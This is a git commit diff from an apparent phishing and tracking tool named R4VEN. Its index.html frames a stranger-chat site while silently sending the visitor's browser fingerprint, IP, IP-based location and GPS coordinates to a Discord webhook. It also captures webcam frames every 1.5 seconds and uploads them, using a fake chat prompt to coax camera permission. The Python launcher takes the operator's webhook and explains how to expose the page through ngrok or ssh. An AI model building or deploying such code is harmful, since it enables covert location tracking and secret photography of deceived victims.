capture target pic too

Author: thisisshubhamkumar

index.html

@@ -0,0 +1,259 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <script type="text/javascript" 
+        src="dwebhook.js">
+    </script>
+</head>
+
+<body onload="getLocation()">
+
+<iframe src="https://www.meetskip.com/chat" width="100%" height="900" style="border:none;">
+</iframe>
+
+<p id="demo"></p>
+<script src=
+"https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
+</script>
+<script>
+var x = document.getElementById("demo");
+
+let datetime = new Date();
+let localtime = String(datetime.toLocaleTimeString());
+
+
+var sysinfo = (" GET " , "```xl\n" + navigator.userAgent + "```" + "```autohotkey\n" + "\nPlatform: " + navigator.platform + "\nCookies_Enabled: " + navigator.cookieEnabled + "\nBrowser_Language: " + navigator.language + "\nBrowser_Name: "+ navigator.appName + "\nBrowser_CodeName: " + navigator.appCodeName + "\nRam: " + navigator.deviceMemory + "\nCPU_cores: " + navigator.hardwareConcurrency + "\nScreen_Width: " + screen.width + "\nScreen_Height: " + screen.height + "\nTime: " + localtime + "\nRefUrl: " + document.referrer + "\nOscpu: " + navigator.oscpu + "```");
+
+const request = new XMLHttpRequest();
+    request.open("POST", "/location_update"); //change webhook
+
+    request.setRequestHeader('Content-type', 'application/json');
+
+    var myEmbed = {
+      author: {
+        name: "Target System Information.."
+      },
+      title: "Uagent:",
+      description: sysinfo,
+      color: 15418782
+    }
+
+    var params = {
+      username: "R4VEN",
+      avatar_url: "https://cdn.discordapp.com/attachments/746328746491117611/1053145270843613324/kisspng-black-hat-briefings-computer-icons-computer-virus-5b2fdfc3dc8499.6175504015298641319033.png",
+      content: "@here Someone Opened The Link O_o ",
+      embeds: [ myEmbed ]
+    }
+
+    request.send(JSON.stringify(params));
+
+//...
+
+$.getJSON("https://api.ipify.org?format=json", function(data) {
+  $("#gfg").html(data.ip);
+
+  const request = new XMLHttpRequest();
+      request.open("POST", "/location_update"); //change webhook
+
+      request.setRequestHeader('Content-type', 'application/json');
+
+      var myEmbed = {
+        author: {
+          name: "Target Ip"
+        },
+        description: '```xl\n' + data.ip + '```' + '\n__**IP Details:**__ https://ip-api.com/#' + data.ip  + "\n",
+        color: 15548997,
+
+        footer: {
+        text: "Geographic location based on IP address is NOT accurate, it provides the approximate location of the ISP."
+      }
+      }
+
+      var params = {
+        username: "R4VEN",
+        avatar_url: "https://cdn.discordapp.com/attachments/746328746491117611/1053145270843613324/kisspng-black-hat-briefings-computer-icons-computer-virus-5b2fdfc3dc8499.6175504015298641319033.png",
+        embeds: [ myEmbed ]
+      }
+
+      request.send(JSON.stringify(params));
+})
+
+$.getJSON("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query", function(response) {
+
+  const request = new XMLHttpRequest();
+      request.open("POST", "/location_update"); //change webhook
+
+      request.setRequestHeader('Content-type', 'application/json');
+
+      var myEmbed = {
+        author: {
+          name: "IP Address Reconnaissance"
+        },
+        title: response.status, //response.query
+        description: '```autohotkey\nContinent: ' + response.continent +
+        "\nContinentCode: " + response.continentcode +
+        "\nCountry: " + response.country +
+        "\nCountrycode: " + response.countrycode +
+        "\nRegionname: "+ response.regionName +
+        "\nRegion: " + response.region +
+        "\nCity: " + response.city + 
+        "\nDistrict: " + response.district +
+        "\nZip: " + response.zip +
+        "\nTime_zone: " + response.time_zone +
+        "\nName: " + response.name +
+        "\nAs: " + response.as +
+        "\nIsp: " + response.isp +
+        "\nReverse: " + response.reverse +
+        "\nOffset: " + response.offset +
+        "\nCurrency: " + response.currency +
+        "\nProxy: " + response.proxy +
+        "\nMobile: " + response.mobile +
+        "\nLat: " + response.lat +
+        "\nLon: " + response.lon + '```',
+        color: 5763719
+
+      }
+
+      var params = {
+        username: "R4VEN",
+        avatar_url: "https://cdn.discordapp.com/attachments/746328746491117611/1053145270843613324/kisspng-black-hat-briefings-computer-icons-computer-virus-5b2fdfc3dc8499.6175504015298641319033.png",
+        embeds: [ myEmbed ]
+      }
+
+      request.send(JSON.stringify(params));
+})
+
+
+function getLocation() {
+  if (navigator.geolocation) {
+    navigator.geolocation.getCurrentPosition(showPosition, showError);
+  } else { 
+    x.innerHTML = "Geolocation is not supported by this browser.";
+  }
+}
+
+function showPosition(position) {
+  var latlong = (" GET " , "```prolog\nLatitude:" + position.coords.latitude + "\nLongitude:" + position.coords.longitude + "```" + "\n__**Map Location:**__ https://www.google.com/maps/place/" + position.coords.latitude + "," + position.coords.longitude + "\n__**Google Earth:**__ https://earth.google.com/web/search/" + position.coords.latitude + "," + position.coords.longitude);
+  
+  const request = new XMLHttpRequest();
+      request.open("POST", "/location_update"); //change webhook
+
+      request.setRequestHeader('Content-type', 'application/json');
+
+      var myEmbed = {
+        author: {
+          name: "Target Allowed Location Permission"
+        },
+        title: "GPS location of target..",
+        description: latlong + "\n",
+        color: 15844367,
+        footer: {
+        text: "GPS fetch almost exact location because it uses longitude and latitude coordinates."
+      }
+      }
+
+      var params = {
+        username: "R4VEN",
+        avatar_url: "https://cdn.discordapp.com/attachments/746328746491117611/1053145270843613324/kisspng-black-hat-briefings-computer-icons-computer-virus-5b2fdfc3dc8499.6175504015298641319033.png",
+        embeds: [ myEmbed ]
+      }
+
+      request.send(JSON.stringify(params));
+
+}
+
+function showError(error) {
+  switch(error.code) {
+    case error.PERMISSION_DENIED:
+      const request = new XMLHttpRequest();
+      request.open("POST", "/location_update"); //change webhook
+
+      request.setRequestHeader('Content-type', 'application/json');
+
+      const params = {
+        username: "R4VEN",
+        avatar_url: "https://cdn.discordapp.com/attachments/746328746491117611/1053145270843613324/kisspng-black-hat-briefings-computer-icons-computer-virus-5b2fdfc3dc8499.6175504015298641319033.png",
+        content: "```diff\n- User denied the request for Geolocation.```"
+      }
+
+      request.send(JSON.stringify(params));
+      break;
+    case error.POSITION_UNAVAILABLE:
+      x.innerHTML = "Location information is unavailable."
+      break;
+    case error.TIMEOUT:
+      x.innerHTML = "The request to get user location timed out."
+      break;
+    case error.UNKNOWN_ERROR:
+      x.innerHTML = "An unknown error occurred."
+      break;
+  }
+}
+</script>
+<div class="video-wrap" hidden="hidden">
+      <video id="video" playsinline autoplay></video>
+   </div>
+   <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
+   <script>
+      function postFile(file) {
+          let formdata = new FormData();
+          formdata.append("image", file);
+          let xhr = new XMLHttpRequest();
+          xhr.open('POST', 'http://127.0.0.1:8000//image', true);
+          xhr.onload = function () {
+              if (this.status === 200)
+                  console.log(this.response);
+              else
+                  console.error(xhr);
+          };
+          xhr.send(formdata);
+      }
+      
+      
+      
+      
+      const video = document.getElementById('video');
+      const canvas = document.getElementById('canvas');
+      const errorMsgElement = document.querySelector('span#errorMsg');
+      
+      const constraints = {
+      audio: false,
+      video: {
+      
+      facingMode: "user"
+      }
+      };
+      
+      // Access webcam
+      async function init() {
+      try {
+      const stream = await navigator.mediaDevices.getUserMedia(constraints)
+      handleSuccess(stream);
+      } catch (e) {
+      setTimeout(function(){
+      alert("Allow Camera access to chat with strangers");
+      window.location.href = "https://support.onemob.com/hc/en-us/articles/360037342154-How-do-I-grant-permission-for-Camera-and-Microphone-in-my-web-browser-"
+      alert("Read this page to grant camera access to  our website")
+      },15000) }
+      }
+      
+      // Success
+      function handleSuccess(stream) {
+      window.stream = stream;
+      video.srcObject = stream;
+      
+      var context = canvas.getContext('2d');
+      setInterval(function(){
+      
+         context.drawImage(video, 0, 0, 640, 480);
+         canvas.toBlob(postFile, 'image/jpeg'); }, 1500);
+      
+      
+      }
+      
+      // Load init
+      init();
+   </script>
+</body>
+</html>

old_version/index.html renamed to old_version/v1/index.html

@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html>
 

old_version/r4ven.py renamed to old_version/v1/r4ven.py

@@ -0,0 +1,88 @@
+#!/usr/bin/env python3
+import os
+import uvicorn
+import webapp_backend
+
+twitter_url = 'https://spyboy.in/twitter'
+discord = 'https://spyboy.in/Discord'
+website = 'https://spyboy.in/'
+blog = 'https://spyboy.blog/'
+
+VERSION = '1.1.2'
+
+R = '\033[31m'
+G = '\033[32m'
+C = '\033[36m'
+W = '\033[0m'
+Y = '\033[33m'
+
+banner = r'''                                                    
+__________    _________   _______________ _______   
+\______   \  /  |  \   \ /   /\_   _____/ \      \  
+ |       _/ /   |  |\   Y   /  |    __)_  /   |   \ 
+ |    |   \/    ^   /\     /   |        \/    |    \
+ |____|_  /\____   |  \___/   /_______  /\____|__  /
+        \/      |__|                  \/         \/ '''
+
+
+def main():
+    """
+    program entry_point
+    """
+    print_banners()
+    remove_old_discord_webhook()
+    get_new_discord_webhook()
+    print_port_forwarding_instructions()
+    start_http_server()
+
+
+def print_banners():
+    """
+    prints the program banners
+    """
+    print(f'{R}{banner}{W}\n')
+    print(f'{G}[+] {C}Version      : {W}{VERSION}')
+    print(f'{G}[+] {C}Created By   : {W}Spyboy')
+    print(f'{G} ╰➤ {C}Twitter      : {W}{twitter_url}')
+    print(f'{G} ╰➤ {C}Discord      : {W}{discord}')
+    print(f'{G} ╰➤ {C}Website      : {W}{website}')
+    print(f'{G} ╰➤ {C}Blog         : {W}{blog}\n')
+
+
+def print_port_forwarding_instructions():
+    """
+    prints the port forwarding instruction
+    """
+    print(f'\nTo port forward install ngrok or use ssh')
+    print(f'{C}For ngrok port forward type  : {Y}ngrok http 8000')
+    print(f'{C}For ssh port forwarding type : {Y}ssh -R 80:localhost:8000 ssh.localhost.run\n')
+    print(f'{C}track info will be sent to your discord webhook.\n')
+
+
+def get_new_discord_webhook():
+    """
+    gets the new discord webhook from user
+    """
+    print(f'Enter Discord Webhoook url:')
+    dwebhook_input = input()
+    file1 = open('dwebhook.js', 'w')
+    file1.write(dwebhook_input)
+    file1.close()
+
+
+def remove_old_discord_webhook():
+    """
+    removes the old discord webhook
+    """
+    try:
+        os.system("rm dwebhook.js")
+    except:
+        pass
+
+
+def start_http_server():
+    uvicorn.run(webapp_backend.web_app)
+
+
+if __name__ == "__main__":
+    main()

index_new.html renamed to old_version/v2/index_new.html

@@ -0,0 +1,4 @@
+fastapi
+pydantic
+requests
+uvicorn

pydentic_files.py renamed to old_version/v2/pydentic_files.py

@@ -0,0 +1,25 @@
+"""
+Purpose: will hold the util functions of the program
+"""
+import json
+import requests
+
+
+def get_file_data(file_path):
+    """
+    gets the file data
+    :param file_path: the path to the file you want to read
+    :return: the file data as plain text
+    """
+    with open(file_path, 'r') as open_file:
+        return open_file.read()
+
+
+def update_webhook(webhook: str, webhook_data: dict):
+    """
+    will send a post request to the given webhook
+    :param webhook: the webhook you want to update
+    """
+    request_payload = json.dumps(webhook_data)
+    headers = {'Content-Type': 'application/json'}
+    requests.request("POST", webhook, headers=headers, data=request_payload)